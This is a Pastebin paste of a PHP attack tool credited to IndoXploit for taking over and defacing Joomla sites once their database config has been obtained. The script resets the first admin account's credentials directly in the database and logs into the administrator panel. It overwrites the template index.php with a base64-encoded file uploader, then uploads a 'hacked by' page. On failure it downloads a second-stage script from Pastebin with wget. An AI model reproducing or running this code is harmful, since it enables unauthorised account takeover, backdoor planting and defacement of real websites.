Tu5b0l3d

Auto Deface Joomla if you get config v1.1

Dec 8th, 2015
1,868
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 10.03 KB | None | 0 0
  1. <?php
  2.  
  3. //Tu5b0l3d
  4. //thx to: IndoXploit
  5. //http://indoxploit.blogspot.com/2015/12/auto-deface-cms-joomla-if-you-get-config.html
  6.  
  7. error_reporting(0);
  8.     if($_POST['submitt']){
  9.  
  10.        
  11. function pereg($anu,$pereg){
  12.                     $ch2 = curl_init ("$anu");
  13.                     curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
  14.                    curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
  15.                     curl_setopt ($ch2, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  16.                     curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
  17.                     curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
  18.                     curl_setopt($ch2, CURLOPT_COOKIEJAR,'coker_log');
  19.                     curl_setopt($ch2, CURLOPT_COOKIEFILE,'coker_log');
  20.                     $data = curl_exec ($ch2);
  21.                                
  22.                         preg_match("/$pereg/", $data, $token1);
  23.                         return $token1[1];
  24. }
  25.  
  26. function ngecurl($sites){
  27.         $ch1 = curl_init ("$sites");
  28. curl_setopt ($ch1, CURLOPT_RETURNTRANSFER, 1);
  29. curl_setopt ($ch1, CURLOPT_FOLLOWLOCATION, 1);
  30. curl_setopt ($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  31. curl_setopt ($ch1, CURLOPT_SSL_VERIFYPEER, 0);
  32. curl_setopt ($ch1, CURLOPT_SSL_VERIFYHOST, 0);
  33. curl_setopt($ch1, CURLOPT_COOKIEJAR,'coker_log');
  34. curl_setopt($ch1, CURLOPT_COOKIEFILE,'coker_log');
  35. $data = curl_exec ($ch1);
  36. return $data;
  37.     }
  38.  
  39. function ambilkata($param, $kata1, $kata2){
  40.     if(strpos($param, $kata1) === FALSE) return FALSE;
  41.     if(strpos($param, $kata2) === FALSE) return FALSE;
  42.     $start = strpos($param, $kata1) + strlen($kata1);
  43.     $end = strpos($param, $kata2, $start);
  44.     $return = substr($param, $start, $end - $start);
  45.     return $return;
  46. }
  47.  
  48. function lohgin($fak1,$fak2,$fak3,$fak4,$fak5){
  49.     $post2 = array(
  50.                     "username" => "$fak1",
  51.                     "passwd" => "$fak2",
  52.                     "lang" => "en-GB",
  53.                     "option" => "com_login",
  54.                     "task" => "login",
  55.                     "return" => "$fak3",
  56.                     "$fak4" => "1",
  57.                    
  58.                     );
  59.  
  60. $ch = curl_init ("$fak5");
  61. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  62. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  63. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  64. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  65. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  66. curl_setopt ($ch, CURLOPT_POST, 1);
  67. curl_setopt ($ch, CURLOPT_POSTFIELDS, $post2);
  68. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
  69. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
  70. $prett = curl_exec($ch);
  71. return $prett;
  72. }
  73.         $host = $_POST['host'];
  74.         $username = $_POST['username'];
  75.         $password = $_POST['password'];
  76.         $db = $_POST['db'];
  77.         $dbprefix = $_POST['dbprefix'];
  78.         $user_baru = $_POST['user_baru'];
  79.         $password_baru = $_POST['password_baru'];
  80.         $tanya = $_POST['tanya'];
  81.         $target = $_POST['target'];
  82.         $hackedby = $_POST['hackedby'];
  83.         $prefix = $dbprefix."users";
  84.         $pass = md5("$password_baru");
  85.         $upda = $db.".".$dbprefix;
  86.  
  87.         mysql_connect($host,$username,$password);
  88.  
  89.         mysql_select_db($db);
  90.  
  91.  
  92.  $tampil=mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  93.     $r=mysql_fetch_array($tampil);
  94.         $id = $r[id];
  95.        
  96.          mysql_query("UPDATE $prefix SET password='$pass',username='$user_baru' WHERE id='$id'");
  97.  
  98.            
  99.             if ($tanya == "y"){
  100.  
  101.                 $path = "/administrator/index.php?option=com_templates&view=templates";
  102.                 $site = $target.$path;
  103.                 $token1 = pereg($site, '<input type=\"hidden\" name=\"return\" value=\"(.*?)\" \/>');
  104.                 $token2 = pereg($site, '<input type=\"hidden\" name=\"(.*?)\" value=\"1\" \/>');
  105.  
  106. //Login            
  107. $aso2 = lohgin($user_baru,$password_baru,$token1,$token2,$site);
  108. $aso = ngecurl($site);
  109. $id = ambilkata($aso, "/administrator/index.php?option=com_templates&amp;view=template&amp;id=","\">");
  110. echo "# ID -> $id .... <br>";
  111. $bener_id = base64_encode("$id:index.php");
  112.  
  113. $akaa = "/administrator/index.php?option=com_templates&task=source.edit&id=$bener_id";
  114. $ak = $target.$akaa;
  115.  
  116.  
  117. $extensi = ngecurl($ak);
  118. $ambil_extensi = ambilkata($extensi, 'id="jform_extension_id" value="','" />');
  119. $file_value = ambilkata($extensi, 'id="jform_filename" value="','" />');
  120. $nama_template = ambilkata($extensi, 'Editing file "index.php" in template "','".</legend>');
  121. echo "# Template -> $nama_template<br>";
  122.  
  123.  
  124.  
  125. $upload = base64_decode("Z3cgZ2FudGVuZw0KPD9waHANCiAgJGZpbGUgPSAkX0ZJTEVTWydmaWxlJ107DQogICRuZXdmaWxlPSJrLnBocCI7DQoJCWlmIChmaWxlX2V4aXN0cygiLi4vLi4vIi4kbmV3ZmlsZSkpIHVubGluaygiLi4uLi8vIi4kbmV3ZmlsZSk7DQogICAgCW1vdmVfdXBsb2FkZWRfZmlsZSgkZmlsZVsndG1wX25hbWUnXSwgIi4uLy4uLyRuZXdmaWxlIik7DQo/Pg0K");
  126. $coeg = "$target/administrator/index.php?option=com_templates&view=template&id=$id&file=";
  127. echo "# Uploading...<br>";
  128.  
  129. $token3 = pereg($coeg, '<input type=\"hidden\" name=\"(.*?)\" value=\"1\" \/>');
  130. $post2 = array(
  131.                     "jform[source]" => "$upload",
  132.                     "task" => "source.save",
  133.                     "$token3" => "1",
  134.                     "jform[extension_id]"=> "$ambil_extensi",
  135.                     "jform[filename]" => "$file_value",
  136.                     );
  137.  
  138. $ch3 = curl_init ("$coeg");
  139. curl_setopt ($ch3, CURLOPT_RETURNTRANSFER, 1);
  140. curl_setopt ($ch3, CURLOPT_FOLLOWLOCATION, 1);
  141. curl_setopt ($ch3, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  142. curl_setopt ($ch3, CURLOPT_SSL_VERIFYPEER, 0);
  143. curl_setopt ($ch3, CURLOPT_SSL_VERIFYHOST, 0);
  144. curl_setopt ($ch3, CURLOPT_POST, 1);
  145. curl_setopt ($ch3, CURLOPT_POSTFIELDS, $post2);
  146. curl_setopt($ch3, CURLOPT_COOKIEJAR,'coker_log');
  147. curl_setopt($ch3, CURLOPT_COOKIEFILE,'coker_log');
  148. $masuk2 = curl_exec ($ch3);
  149.  
  150.  
  151. if(preg_match("#successfully#is", $masuk2)){
  152. echo "# uploader udh ketanem...<br>";
  153. echo "# lanjut mepes...<br>";
  154.  
  155. $www = "m.php";
  156. $fp5 = fopen($www,"w");
  157. fputs($fp5,$hackedby);
  158.  
  159. $ch4 =curl_init("$target/templates/$nama_template/index.php");
  160.                             curl_setopt($ch4, CURLOPT_POST, true);
  161.                             curl_setopt($ch4, CURLOPT_POSTFIELDS,
  162.                             array('file'=>"@$www"));
  163.                             curl_setopt($ch4, CURLOPT_RETURNTRANSFER, 1);
  164.                             curl_setopt ($ch4, CURLOPT_SSL_VERIFYPEER, 0);
  165.                             curl_setopt ($ch4, CURLOPT_SSL_VERIFYHOST, 0);
  166.                             $postResult = curl_exec($ch4);
  167.                             curl_close($ch4);
  168.  
  169.  
  170.    $ch5 = "$target/k.php";
  171. $file2 = @file_get_contents($ch5);
  172.                            
  173.  
  174.                      if(preg_match('#hacked#is', $file2)){
  175.                         echo "# <font color='green'>berhasil mepes...</font><br>";
  176.                         echo "$target/k.php<br>";
  177.                     }
  178.                     else{
  179.                         echo "# <font color='red'>gagal mepes...</font><br>";
  180.                         echo "# coba aja manual: <br>";
  181.                         echo "# $target/administrator<br>";
  182.                         echo "# username: $user_baru<br>";
  183.                         echo "# password: $password_baru<br>";                  
  184.                     }
  185.                
  186. }
  187. else{
  188.     echo "# failed<br>";
  189.     echo "# data udh bener. beda versi joomla mungkin :(<br>";
  190.     echo "# coba aja manual: <br>";
  191.     echo "# $target/administrator<br>";
  192.     echo "# username: $user_baru<br>";
  193.     echo "# password: $password_baru<br><br>";
  194.     echo "# atau coba yg versi 2<br>";
  195.     system('wget http://pastebin.com/raw.php?i=GAvpSP68');
  196.     system('cp raw.php?i=GAvpSP68 joomla-2.php');
  197.     echo "<a href='joomla-2.php' style='text-decoration:none;'>Disini..</a><br>";
  198. }
  199.  
  200.          }
  201.             elseif($tanya == "n"){
  202.             echo "# Sukses<br>";
  203.             echo "# username: $user_baru<br>";
  204.             echo "# password: $password_baru<br>";
  205.  
  206.             }
  207.        
  208.         }
  209.  
  210.         else{
  211.  
  212.             echo '<html>
  213.  
  214.    <head>
  215.        <title>Edit user in joomla v1.1</title>
  216.    </head>
  217.  
  218.    <body>
  219.        <center>
  220.                        <h2>Joomla | created by IndoXploit</h2>
  221.  
  222.                        <table>
  223.  
  224.                            <tr><td><form method="post" action="?action"></td></tr>
  225.  
  226.                            <tr><td><input type="text" name="host" placeholder="localhost"></td></tr>
  227.  
  228.                            <tr><td><input type="text" name="username" placeholder="User DB"></td></tr>
  229.  
  230.                            <tr><td><input type="text" name="password" placeholder="Password DB"></td></tr>
  231.  
  232.                            <tr><td><input type="text" name="db" placeholder="Database"></td></tr>
  233.  
  234.                            <tr><td><input type="text" name="dbprefix" placeholder="dbprefix"></td></tr>
  235.  
  236.                            <tr><td><input type="text" name="user_baru" placeholder="Username Baru"></td></tr>
  237.  
  238.                            <tr><td><input type="text" name="password_baru" placeholder="Password Baru"></td></tr>
  239.                            <tr><td></td></tr>
  240.                            <tr><td></td></tr>
  241.                          
  242.  
  243.                            <tr><td> Auto Deface <input type="radio" name="tanya" value="y"> y <input type="radio" name="tanya" value="n"> n</td></tr>
  244.                             <tr><td><input type="text" name="target" placeholder="www.IndoXploit.org"></td></tr>
  245.                             <tr><td><input type="text" name="hackedby" placeholder="Hacked By Tu5b0l3d"></td></tr>
  246.  
  247.                            <tr><td><input type="submit" value="Submit" name="submitt"></td></tr>
  248.  
  249.                        </table>
  250.                        *nb: kalo milih y ... silahkan masukin nama sitenya, kalo ngk tau nama sitenya, pilih n
  251.  
  252.            </center>
  253.  
  254.    </body>';
  255.  
  256.         }
  257.  
  258.  
  259.  
  260. ?>
Add Comment
Please, Sign In to add comment